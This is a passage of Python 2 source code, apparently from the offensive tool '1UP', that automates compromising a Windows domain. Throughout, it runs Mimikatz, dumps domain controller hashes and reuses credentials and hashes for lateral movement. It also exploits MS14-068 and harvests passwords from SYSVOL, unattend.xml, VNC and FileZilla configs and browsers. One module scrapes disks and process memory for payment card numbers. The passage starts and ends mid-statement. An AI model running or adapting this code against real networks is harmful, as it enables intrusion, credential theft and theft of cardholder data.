tmpusername=tmpusername.split(\"\\\\\")[1]   \n            tmpdomain=tmpusername.split(\"\\\\\")[0]\n            if len(tmpdomain)<1:\n                tmpdomain='WORKGROUP'\n            #print \"domain : \"+tmpdomain\n            if [ip,tmpdomain,tmpusername,tmphash] not in userHashList:\n                    userHashList.append([ip,tmpdomain,tmpusername,tmphash])\n        else:\n            tmpdomain=getNetBiosName(ip)                                \n            if len(tmpdomain)<1:\n                tmpdomain='WORKGROUP'\n            #print \"domain1 : \"+tmpdomain\n            if [ip,tmpdomain,tmpusername,tmphash] not in userHashList:\n                    userHashList.append([ip,tmpdomain,tmpusername,tmphash])\n\ndef accessRemoteShare(targetIP,filePath,domain, username, password):\n    complete=False\n    status=False\n    while complete==False:\n        try:\n            conn = None\n            conn = SMBConnection1(username,password,client_machine_name,targetIP,domain=domain,use_ntlm_v2=True,is_direct_tcp=True)\n            connected = conn.connect(targetIP, 445)  \n            shareName=filePath.split(\"/\")[0]\n            subDirectory=filePath.replace(shareName,\"\")\n            sharedfiles = conn.listPath(shareName, subDirectory)\n            conn = None\n            complete=True\n            status=True\n        except Exception as e:\n            if \"Unknown status value\" in str(e):\n                complete=False\n            else:\n                complete=True\n            status=False\n    return status\n\ndef my_tcp_server():\n    port=8000\n    server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)\n    addr, port = server.server_address\n    #print(\"Serving HTTP on %s port %d ...\" % (addr, port))\n    try:\n        while 1:\n            sys.stdout.flush()\n            server.handle_request()\n    except KeyboardInterrupt:\n        print \"Finished\"\n\nparser = argparse.ArgumentParser(\n        prog='PROG',\n        formatter_class=argparse.RawDescriptionHelpFormatter,\n        description=('''\\\n1UP\n+-- https://github.com/milo2012/1UP\n'''))\n#parser.add_argument(\"target\", nargs='*', type=str, help=\"The target IP(s), range(s), CIDR(s), hostname(s), FQDN(s) or file(s) containg a list of targets\")\nparser.add_argument(\"target\", nargs='*', type=str, help=\"The target IP(s), range(s), CIDR(s), hostname(s), FQDN(s) or file(s) containg a list of targets\")\nparser.add_argument(\"-d\", type=str, dest=\"domain\", help=\"Domain Name\")\nparser.add_argument(\"-u\", type=str, dest=\"username\", help=\"Username\")\nparser.add_argument(\"-p\", type=str, dest=\"password\", help=\"Password\")\nparser.add_argument('-L', '--list-modules', action='store_true', help='List available modules')\nmcgroup = parser.add_mutually_exclusive_group()\nmcgroup.add_argument(\"-M\", \"--module\", metavar='MODULE', help='Payload module to use')\nparser.add_argument('-o', metavar='MODULE_OPTION', nargs='+', default=[], dest='module_options', help='Payload module options')\nparser.add_argument(\"-v\", \"--verbose\", action='store_true', help=\"Verbose mode\")\nif len(sys.argv) == 1:\n        parser.print_help()\n        sys.exit(1)\nargs = parser.parse_args()\nif len(args.target)<1:\n print \"[!] Please set a target\"\n sys.exit()\n if args.verbose:\n    verbose=True\nif args.domain:\n    domain=args.domain\nif args.username:\n    username=args.username\nif args.password:\n    password=args.password\nif not args.domain or not args.username or not args.password:\n    print (setColor(\"[!]\", bold, color=\"red\"))+\" Please provide the domain, username and password\"\n    sys.exit()\n#print args.target\n#for target in args.target:\n#    print target\n#sys.exit()\n\nif args.list_modules:\n    tmpResultList=[]\n    tmpResultList.append(['pan','Dump and search PAN numbers from disks and memory'])\n    tmpResultList.append(['shares','Find the correct account credentials to access shares/folders'])\n    tmpResultList.append(['passwords','Find passwords'])\n    print tabulate(tmpResultList)\n    os._exit(0)\n\ninput=args.target[0]\nif \"/\" in input:\n    for x in IPNetwork(input):\n        if str(x) not in ipList:\n            if str(x) not in ipList: \n                ipList.append(str(x))\nelse:\n    if os.path.exists(input):\n        with open(input) as f:\n            lines = f.read().splitlines()\n            for x in lines:\n                if \"/\" in x:\n                    for y in IPNetwork(x):\n                        if str(y) not in ipList:\n                            if str(y) not in ipList:\n                                ipList.append(str(y))\n                else:\n                    if x not in ipList:\n                        ipList.append(x)\n\nif demo==True:\n    setDemo()\ncmd=\"rm -rf /tmp/.export\"\nrunCommand(cmd, shell = True, timeout = 30)\ncmd=\"rm -rf /tmp/ntds.export\"\nrunCommand(cmd, shell = True, timeout = 30)\ncmd=\"rm \"+os.getcwd()+\"/system\"\nrunCommand(cmd, shell = True, timeout = 30)\ncmd=\"rm \"+os.getcwd()+\"/NTDS\"\nrunCommand(cmd, shell = True, timeout = 30)\n\npasswordHash=None\n\nportList=[]\nportList.append(\"389\")\nportList.append(\"445\")\nportList.append(\"1433\")\nportList.append(\"3389\")\n\nipListStr=\", \".join(ipList)\nprint (setColor(\"[*]\", bold, color=\"green\"))+\" Scanning Target Network\"\n#ip='172.16.126.143'\nmyIP=get_ip_address()\n#os.system(\"cd \"+os.getcwd()+\"/modules && python -m SimpleHTTPServer & > /dev/null 2>&1\")    \n\n#Web server for powershell scripts\nweb_dir = os.getcwd()+\"/modules\"\nos.chdir(web_dir)\nthreading.Thread(target=my_tcp_server).start()\n\nimport resource\nresource.setrlimit(resource.RLIMIT_NOFILE, (1024, 3000))\nscreenLock = threading.Semaphore(value=3)\nfor port in portList:\n    for x in ipList:\n        scanThread(x, port)\nfor x in liveList:\n    hostNo=x[0]\n    portNo=x[1]\n    #if portNo=='3389':\n    #    if hostNo!=myIP:\n    #        rdpList.append(hostNo)\n    if portNo=='1433':\n        if hostNo!=myIP:\n            mssqlList.append(hostNo)\n    if portNo=='3389':\n        rdpList.append(hostNo)\n    if portNo=='445':\n        if hostNo not in dcList:\n            if hostNo!=myIP:\n                nbList.append(hostNo)\n    if portNo=='389':\n        dcList.append(hostNo)\n        if hostNo in nbList:\n            nbList.remove(hostNo)\nif len(dcList)<1 and len(rdpList)<1 and len(nbList)<1:\n    print \"[+] No Domain Controllers/NetBIOS/RDP ports detected on target hosts\"\n    sys.exit()\nelse:\n    print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Found the below hosts\"\n    for x in dcList:\n        print x+\" [DC]\"\n        if x not in uncompromisedHostList:\n            uncompromisedHostList.append(x)\n    for x in nbList:\n        print x+\" [NBNS]\"\n        if x not in uncompromisedHostList:\n            uncompromisedHostList.append(x)\n    for x in rdpList:\n        print x+\" [RDP]\"        \n    for x in mssqlList:\n        print x+\" [MSSQL]\"        \n    print \"\\n\"\n\n#print (setColor(\"\\nPlease try to login into the below RDP servers manually and run the below commands\", bold, color=\"red\"))\n#for ip in rdpList:\n#    localPrivEscalation()\n#    print \"\\n\"\nisDomainAccount=False\n#logging.getLogger().setLevel(logging.INFO)\n#logging.getLogger().setLevel(logging.CRITICAL)\nlogging.getLogger().setLevel(logging.ERROR)\nlogging.disabled = False\npasswordHash=None\n\nif len(dcList)>0:\n    isDA=getDomainAdminUsers(username,password,dcList[0])\n\nif domain.lower()!=\"workgroup\":\n    if len(dcList)>0:\n        ip=dcList[0]\n        continueOK=False\n        tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,ip,domain)\n        if tmpLoginOK==True:\n            if [domain,username,password] not in userPassList:\n                userPassList.append([domain,username,password])\n            continueOK=True\n        if continueOK==True:\n\n            for ip in nbList:\n                tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,ip,domain)\n                if tmpLoginOK==True:\n                    if [domain,username,password] not in userPassList:\n                        userPassList.append([domain,username,password])\n                if tmpAdminOK==True:\n                    tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n                    for y in tmpPasswordList:\n                        if y not in userPassList:\n                            userPassList.append(y)            \n                    print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                    tmpHashList=dumpDCHashes(ip,domain,username,password)\n                    if len(tmpHashList)>0:\n                        addHashes(tmpHashList)\n                        if ip in uncompromisedHostList:\n                            uncompromisedHostList.remove(ip)\n                        dcCompromised=True\n                    analyzeHashes(tmpHashList)\n                    if optionTokenPriv==True:\n                        print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                        tokensPriv(ip,domain,username,password,passwordHash)\n\nelse:\n    for ip in dcList:\n        tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,ip,domain)        \n        if tmpLoginOK==True:\n            if [domain,username,password] not in userPassList:\n                userPassList.append([domain,username,password])\n        if tmpAdminOK==True:\n            if dcCompromised==False:\n                tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n                for y in tmpPasswordList:\n                    if y not in userPassList:\n                        userPassList.append(y)            \n                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                tmpHashList=dumpDCHashes(ip,domain,tmpusername,tmppassword)\n                if len(tmpHashList)>0:\n                    addHashes(tmpHashList)\n                    if ip in uncompromisedHostList:\n                        uncompromisedHostList.remove(ip)\n                    for ip in dcList:\n                        if [ip, domain, tmpusername, tmppassword] not in accessAdmHostList:\n                            accessAdmHostList.append([ip, domain, tmpusername, tmppassword])\n                    dcCompromised=True\n                analyzeHashes(tmpHashList)\n                if optionTokenPriv==True:\n                    print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                    tokensPriv(ip,domain,username,password,passwordHash)\n\n\n    for ip in nbList:\n        tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,ip,domain)        \n        if tmpLoginOK==True:\n            if [domain,username,password] not in userPassList:\n                userPassList.append([domain,username,password])\n        if tmpAdminOK==True:\n            tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n            for y in tmpPasswordList:\n                if y not in userPassList:\n                    userPassList.append(y)            \n            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n            tmpHashList=dumpDCHashes(ip,domain,username,password)\n            if len(tmpHashList)>0:\n                addHashes(tmpHashList)\n                if ip in uncompromisedHostList:\n                    uncompromisedHostList.remove(ip)\n                dcCompromised=True\n            analyzeHashes(tmpHashList)\n            if optionTokenPriv==True:\n                print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                tokensPriv(ip,domain,username,password,passwordHash)\n\n'''\nif len(accessAdmHostList):\n    print \"\\nADMIN$ Access on the Below Hosts\"\nprint tabulate(accessAdmHostList)\nif len(accessOKHostList):\n    print \"\\nCredentials Valid on the Below Hosts\"\nprint tabulate(accessOKHostList)\n'''\n\nif len(dcList)>0:\n    for ip in dcList:\n        #isDA=getDomainAdminUsers(username,password,ip)\n        if isDA==True:\n            tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n            for y in tmpPasswordList:\n                if y not in userPassList:\n                    userPassList.append(y)            \n    if isDA==False:        \n        print (setColor(\"\\nChecking SYSVOL for Credentials\", color=\"green\"))\n        mountSysvol(username,password)\n        if optionMS14068==True:\n            tmpPassList,tmpHashList=testMS14_068(ip,domain,username,password,passwordHash)\n            if len(tmpPassList)>0 or len(tmpHashList)>0:\n                for x in tmpHashList:\n                    hashList.append(x)\n                for x in tmpPassList:\n                    passList.append(x)\n\n                for x in tmpPassList:\n                    tmpusername=x[1]\n                    tmppassword=x[2]\n                    if dcCompromised==False:\n                        print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                        tmpHashList=dumpDCHashes(dcList[0],domain,tmpusername,tmppassword)\n                        addHashes(tmpHashList)\n                        if len(tmpHashList)>0:\n                            addHashes(tmpHashList)\n                            if dcList[0] in uncompromisedHostList:\n                                uncompromisedHostList.remove(dcList[0])\n                            for dc in dcList:\n                                if [dc, domain, tmpusername, tmppassword] not in accessAdmHostList:\n                                    accessAdmHostList.append([dc, domain, tmpusername, tmppassword])\n                            dcCompromised=True\n                        analyzeHashes(tmpHashList)\n\nelse:        \n    for ip in nbList:              \n        tmpFound=False\n        tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,ip,domain)\n        if tmpLoginOK==True:\n            if [domain,username,password] not in userPassList:\n                userPassList.append([domain,username,password])\n        if tmpAdminOK==True:\n            tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)\n            for y in tmpPasswordList:\n                if y not in userPassList:\n                    userPassList.append(y)            \n            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n            tmpHashList=dumpDCHashes(ip,domain,username,password)\n            addHashes(tmpHashList)\n            if len(tmpHashList)>0:\n                addHashes(tmpHashList)\n                if ip in uncompromisedHostList:\n                    uncompromisedHostList.remove(ip)\n                dcCompromised=True\n            analyzeHashes(tmpHashList)\n\n            if optionTokenPriv==True:\n                print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                tokensPriv(ip,domain,username,password,passwordHash)\n\nif len(uncompromisedHostList)>0:\n    print (setColor(\"\\nReusing Credentials and Hashes For Lateral Movement in the Network\", bold, color=\"green\"))\ncomplete=False\nwhile complete==False:\n    if len(uncompromisedHostList)<1:\n        complete=True\n    else:\n        for y in uncompromisedHostList:            \n            if len(userPassList)>0:\n                for x in userPassList:\n                    if y in uncompromisedHostList:\n                        tmpip=y\n                        tmpdomain=x[0]\n                        tmpusername=x[1]\n                        tmppassword=x[2]\n                        tmphash=None\n                        #if (tmpusername.lower()).strip()==\"administrator\":\n                        if len(tmppassword)>0 and tmppassword!='(null)':\n                            tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,None,tmpip,tmpdomain)\n                            if tmpLoginOK==True:\n                                if [domain,username,password] not in userPassList:\n                                    userPassList.append([domain,username,password])\n                            if tmpAdminOK==True:                                \n                                tmpPasswordList=runMimikatz(tmpip,tmpdomain,tmpusername,tmppassword,tmphash)\n                                for z in tmpPasswordList:\n                                    if z not in userPassList:\n                                        userPassList.append(z)                        \n                                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+tmpip                \n                                tmpHashList=dumpDCHashes(tmpip,tmpdomain,tmpusername,tmppassword)\n                                addHashes(tmpHashList)\n                                if len(tmpHashList)>0:\n                                    addHashes(tmpHashList)\n                                    if tmpip in uncompromisedHostList:\n                                        uncompromisedHostList.remove(tmpip)\n                                if optionTokenPriv==True:\n                                    print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                                    tokensPriv(tmpip,tmpdomain,tmpusername,tmppassword,tmphash)\n\n\n\n            if len(userHashList)>0:\n                for x in userHashList:\n                    if y in uncompromisedHostList:\n                        tmpip=y\n                        tmpdomain=x[1]\n                        tmpusername=x[2]\n                        tmppasswordHash=x[3]\n                        tmppassword=None\n                        tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,tmpip,tmpdomain)                    \n                        if tmpLoginOK==True:\n                            if [domain,username,password] not in userPassList:\n                                userPassList.append([domain,username,password])\n                        if tmpAdminOK==True:\n                            if (tmpusername.lower()).strip()==\"administrator\":\n                                tmpPasswordList=runMimikatz(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                for y in tmpPasswordList:\n                                    tmpdomain=y[0]\n                                    tmpusername=y[1]\n                                    tmppassword=y[2]\n                                    print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+tmpip\n                                    tmpHashList=dumpDCHashes(tmpip,tmpdomain,tmpusername,tmppassword)\n                                    addHashes(tmpHashList)\n                                    if len(tmpHashList)>0:\n                                        addHashes(tmpHashList)\n                                    if y not in userPassList:\n                                        userPassList.append(y)                        \n\n                                    if tmpip in uncompromisedHostList:\n                                        uncompromisedHostList.remove(tmpip)\n\n    print (setColor(\"\\nList of Passwords in Database\", bold, color=\"green\"))\n    if len(userPassList)<1:\n        print \"No passwords found\"\n    else:\n        print tabulate(userPassList)\n\n    print (setColor(\"\\nList of Hashes in Database\", bold, color=\"green\"))\n    if len(userHashList)<1:\n        print \"No hashes found\"\n    else:\n        print tabulate(userHashList)\n\n    print (setColor(\"\\nList of Hosts Uncompromised\", bold, color=\"green\"))\n    if len(uncompromisedHostList)>0:\n        for x in uncompromisedHostList:\n            print x\n    else:\n        print \"All hosts have been compromised\"\n    complete=True\n\nprint (setColor(\"\\nAdmin Access on the Below Hosts\", bold, color=\"green\"))\nprint tabulate(accessAdmHostList)\n\nif args.module==\"pan\":\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n        results=diskCredDump(ip,domain,username,password,passwordHash)\n        for x in results:\n            x=x.strip()\n            if len(x)>0:\n                tmpResultList.append([ip,x])    \n    if len(tmpResultList)>0:\n        print (setColor(\"\\nSearch Drives for PAN Numbers\", bold, color=\"green\"))\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n\n    if len(accessAdmHostList)>0:\n        print (setColor(\"\\nProcesses Running on Hosts\", bold, color=\"green\"))\n        dict={}        \n        for x in accessAdmHostList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            password=x[3]\n            tmpResultList=listProcesses(ip,domain, username, password)\n            tmpResultList1=[]\n            for y in tmpResultList:\n                if len(y)>0:\n                    if [y,ip] not in tmpResultList1:\n                        tmpResultList1.append([y,ip])\n            for y in tmpResultList1:\n                try:\n                    tmpStr=dict[y[0]]\n                    tmpStr+=\", \"+y[1]\n                    dict[y[0]]=tmpStr\n                except KeyError:\n                    dict[y[0]]=y[1]    \n        tmpResultList2=[]      \n        tmpCount=1                                        \n        for key, value in dict.iteritems():\n            tmpResultList2.append([tmpCount,key,value])\n            tmpCount+=1\n        print tabulate(tmpResultList2)\n        print \"[*] Please enter a number or enter '*' to dump and search all processes\"\n        tmpCount=3\n        print selectedHostList\n        selectedOption=(raw_input()).strip()\n        selectedProcess=''\n        selectedHostList=[]\n        for x in tmpResultList2:\n            if selectedOption==x[0] or selectedOption==\"*\":\n                print x\n                selectedProcess=x[1]\n                tmpSelectedHosts=x[2]\n                if \",\" in tmpSelectedHosts:\n                    tmpList1=tmpSelectedHosts.split(\",\")\n                    for g in tmpList1:\n                        g=g.strip()\n                        selectedHostList.append(g)\n                else:\n                    selectedHostList.append(x[2])\n\n        print (setColor(\"\\nSearching Memory for PAN Numbers\", bold, color=\"green\"))\n        for x in accessAdmHostList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            password=x[3]\n            if ip in selectedHostList:\n                command='del %temp%\\mem_output.txt /F /Q'\n                results=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n                print \"Dumping Process: \"+selectedProcess+\" on Host: \"+ip   \n                tmpResultList=memCredDump(ip,domain,username,password,passwordHash,selectedProcess)\n\n                print \"\\nValidating PAN Numbers\"\n                command='type %temp%\\mem_output.txt'\n                results=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n                tmpResultList1=[]\n                tmpResultList=results.split(\"\\n\")\n                count=0\n                for x in tmpResultList:\n                    x=x.strip()\n                    if \"POSSIBLE CARD NUM: \" in x:\n                        x=(x.split(\"POSSIBLE CARD NUM: \")[1]).strip()\n                        if x>1:\n                            cardNo=x\n                            if cardLuhnChecksumIsValid(cardNo)==True:\n                                tmpResultList1.append(tmpResultList[count-1])\n                                tmpResultList1.append(tmpResultList[count])\n                    count+=1        \n                if len(tmpResultList1)>0:\n                    for x in tmpResultList1:\n                        print x\n                command='del %temp%\\mem_output.txt /F /Q'\n                results=runWMIEXEC(ip,domain,username,password,passwordHash,command)    \n\nif args.module==\"shares\":\n    #python ms14_068.py 172.16.126.0/24 -d corp -u milo -p Password1 -M shares -o host=172.16.126.176\n    svrFilterList=[]\n    if args.module_options:\n        if \"host=\" in args.module_options[0]:\n            tmpip=(args.module_options[0]).replace(\"host=\",\"\")\n            svrFilterList.append(tmpip)\n    #if len(accessAdmHostList)>0:\n    if len(accessAdmHostList)>0:\n        tmpBlackList=[]\n        tmpBlackList.append(\"Application Data\")\n        tmpBlackList.append(\"Cookies\")\n        tmpBlackList.append(\"Local Settings\")\n        tmpBlackList.append(\"NetHood\")\n        tmpBlackList.append(\"PrintHood\")\n        tmpBlackList.append(\"Recent\")\n        tmpBlackList.append(\"Start Menu\")\n        tmpBlackList.append(\"Templates\")\n        tmpBlackList.append(\"SendTo\")\n        tmpBlackList.append(\"Videos\")\n        tmpBlackList.append(\"Pictures\")\n        tmpBlackList.append(\"Music\")\n        tmpBlackList.append(\"Saved Games\")\n        tmpBlackList.append(\"Searches\")\n        tmpBlackList.append(\"Links\")\n        tmpBlackList.append(\"Contacts\")\n        tmpBlackList.append(\"ProgramData\")\n        tmpBlackList.append(\"Program Files\")\n        tmpBlackList.append(\"Program Files (x86)\")\n        if args.module_options:\n            tmpFound=False\n            for x in accessAdmHostList:\n                tmpip=x[0]\n                if tmpip in svrFilterList:\n                    tmpFound=True\n            print (setColor(\"\\nTesting Access to Shared Folders\", bold, color=\"green\"))            \n            if tmpFound==False:\n                print \"No suitable hosts found\"\n        else:\n            print (setColor(\"\\nTesting Access to Shared Folders\", bold, color=\"green\"))            \n\n        for x in accessAdmHostList:\n            headers = [\"IP\", \"Share/File\",\"Status\",\"Credentials\"]\n            tmpip=x[0]\n            tmpdomain=x[1]\n            tmpusername=x[2]\n            tmppassword=x[3]\n            try:\n                if len(svrFilterList)>0:\n                    if tmpip in svrFilterList:\n                        allowedList, deniedList=listRemoteShare(tmpip,tmpdomain, tmpusername, tmppassword)\n                else:\n                    allowedList, deniedList=listRemoteShare(tmpip,tmpdomain, tmpusername, tmppassword)\n                tmpOKList=[]\n                tmpFailedList=[]\n                credStr=tmpusername+\"|\"+tmppassword\n                if len(allowedList)>0:\n                    for x in allowedList:\n                        tmpFound=False\n                        for g in tmpBlackList:\n                            if g.lower() in x[3].lower():\n                                tmpFound=True\n                        if tmpFound==False:\n                            tmpOKList.append([x[0],str(x[3]),\"[OK]\",credStr])\n                if len(deniedList)>0:\n                    for x in deniedList:                  \n                        tmpFailedList.append([x[0],str(x[3]),\"[FAILED]\"])\n\n                if len(tmpFailedList)>0:\n                    tmpUserPassList=[]\n                    if len(userPassList)>0:\n                        print \"Testing credentials\"\n                        for z in userPassList:\n                            tmpLoginOK,tmpAdminOK=testDomainCredentials(z[1],z[2],None,tmpip,z[0])\n                            if tmpLoginOK==True:\n                                tmpUserPassList.append(z)\n                    if len(tmpFailedList)>0:\n                        print \"\\nTesting access\"\n                        for z in tmpFailedList:\n                            tmpFound=False\n                            if tmpFound==False:\n                                for y in tmpUserPassList:\n                                    try:\n                                        targetIP=z[0]\n                                        filePath=z[1]\n                                        tmpdomain=y[0]\n                                        tmpusername=y[1]\n                                        tmppassword=y[2]\n                                        #if filePath==\"share/finance\":\n                                        if accessRemoteShare(targetIP,filePath,tmpdomain, tmpusername, tmppassword)==True:\n                                            credStr=tmpusername+\"|\"+tmppassword\n                                            tmpOKList.append([targetIP,filePath,\"[OK]\",credStr])\n                                            tmpFound=True\n                                    except:\n                                        continue\n                    print tabulate(tmpOKList)\n                    '''\n                for g in tmpOKList:\n                    tmpFailedList1=tmpFailedList\n                    for h in tmpFailedList1:\n                        if g[0]==h[0] and g[1]==h[1]:\n                            tmpFailedList.remove(h)\n                print tabulate(tmpFailedList)\n                '''\n\n            except Exception as e:\n                continue\nif args.module==\"reg\":\n    print (setColor(\"\\nFind Interesting Registry Keys\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        results=findInterestingRegKeys(ip,domain,username,password,passwordHash)\n        for y in results:    \n            if y not in tmpResultList:     \n                tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        headers = [\"Host\",\"Reg Path\", \"Password/Hash\"]\n        print tabulate(tmpResultList,headers)\n\n    if len(accessAdmHostList)>0:\n        tmpResultList=[]\n        for x in accessAdmHostList:\n            tmpip=x[0]\n            tmpdomain=x[1]\n            tmpusername=x[2]\n            tmppasswordHash=\"\"\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                tmppasswordHash=x[3]\n                tmppassword=None\n            else:\n                tmppassword=x[3]\n                tmppasswordHash=None\n            usersLoggedIntoHostList=listUsers(tmpip,domain,tmpusername,tmppassword,tmppasswordHash)\n            tmpStr=\", \".join(usersLoggedIntoHostList)\n            if [tmpip,tmpStr] not in tmpResultList:\n                tmpResultList.append([tmpip,tmpStr])\n    if len(tmpResultList)>0:\n        print (setColor(\"\\nUsers Logged into Host\", bold, color=\"green\"))\n        headers = [\"Host\",\"Users\"]\n        print tabulate(tmpResultList,headers,tablefmt=\"simple\")\n\n\n    print (setColor(\"\\nFind Interesting Files\", bold, color=\"green\"))\n    if len(accessAdmHostList)>0:\n        for x in accessAdmHostList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n            tmpFileList=findInterestingFiles(ip,domain,username,password,passwordHash)\n            if len(tmpFileList)>0:\n                count=0\n                for filename in tmpFileList:           \n                    filename=filename.strip()\n                    tmpFilename=(downloadFile(ip,domain,username,password,filename))\n                    if len(tmpFilename)>0:\n                        if count>0:\n                            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+filename+\" | \"+tmpFilename\n\n                        else:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+filename+\" | \"+tmpFilename\n                        if \"unattend.xml\" in filename.lower() or \"sysprep.xml\" in filename.lower():\n                            tmpResultList=parseUnattendXML(tmpFilename)\n                            if len(tmpResultList)>0:\n                                headers = [\"Username\",\"Password\"]\n                                print tabulate(tmpResultList,headers,tablefmt=\"simple\")\n                                print \"\\n\"\n                            #for x in tmpResultList:\n                            #    print \"Username: \"+x[0]\n                            #    print \"Password: \"+x[1]\n                        if \"ultravnc.ini\" in filename.lower():\n                            tmpResultList=parseUltraVNC(tmpFilename)\n                            for x in tmpResultList:\n                                print \"Password1: \"+x[0]\n                                print \"Password2: \"+x[1]\n                        if \"sitemanager.xml\" in filename.lower():\n                            tmpResultList=parseSiteManagerXML(tmpFilename)\n                            headers = [\"Host\", \"Username\",\"Password\"]\n                            print tabulate(tmpResultList,headers,tablefmt=\"simple\")                    \n                        if \".txt\" in filename.lower():\n                            with open(tmpFilename) as f:\n                                lines = f.read().splitlines()\n                                count1=0\n                                if len(lines)<10:\n                                    for x in lines:\n                                        x=x.strip()\n                                        if count1<10:\n                                            print x\n                                    count1+=1\n                        count+=1\n\n\n\nif args.module==\"passwords\":\n    '''\n    print (setColor(\"\\nDumping Wifi Passwords\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n        results=dumpWifi(ip,domain,username,password,passwordHash)\n        for y in results:\n            tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        print (setColor(\"\\nWifi Credentials\", bold, color=\"green\"))\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n    '''\n\n    print (setColor(\"\\nDumping Browser Passwords\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        tmpip=x[0]\n        tmpdomain=x[1]\n        tmpusername=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            tmppasswordHash=x[3]\n            tmppassword=None\n        else:\n            tmppassword=x[3]\n        results=dumpBrowser(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n        if len(results)>0:\n            for y in results:\n                if y not in tmpResultList:\n                    tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Browser Credentials\"\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n    '''\n\n    print (setColor(\"\\nIIS Credentials\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n        results=dumpIIS(ip,domain,username,password,passwordHash)\n        for y in results:\n            tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n\n    print setColor('\\nWindows Vault Credentials', bold, color='green')\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n        results=runDumpVault(ip,domain,username,password,passwordHash)\n        for y in results:\n            tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n    '''\nos._exit(0)\n\nprint (setColor(\"\\nList of Installed Programs\", bold, color=\"green\"))\ntmpResultList=[]\nfor x in accessAdmHostList:\n    tmphostno=x[0]\n    tmpdomain=x[1]\n    tmpusername=x[2]\n    tmppasswordHash=\"\"\n    tmppassword=\"\"\n    if len(x[3])==65 and x[3].count(\":\")==1:\n        tmppasswordHash=x[3]\n        tmppassword=None\n    else:\n        tmppassword=x[3]   \n    if len(tmppasswordHash)<1:\n        tmpAppList=getInstalledPrograms(tmphostno,tmpdomain,tmpusername,tmppassword,tmppasswordHash)        \n        for y in tmpAppList:\n            if y not in tmpResultList:\n                tmpResultList.append(y)\nif len(tmpResultList)>0:\n    headers = [\"Host\",\"Software\", \"Version\"]\n    print 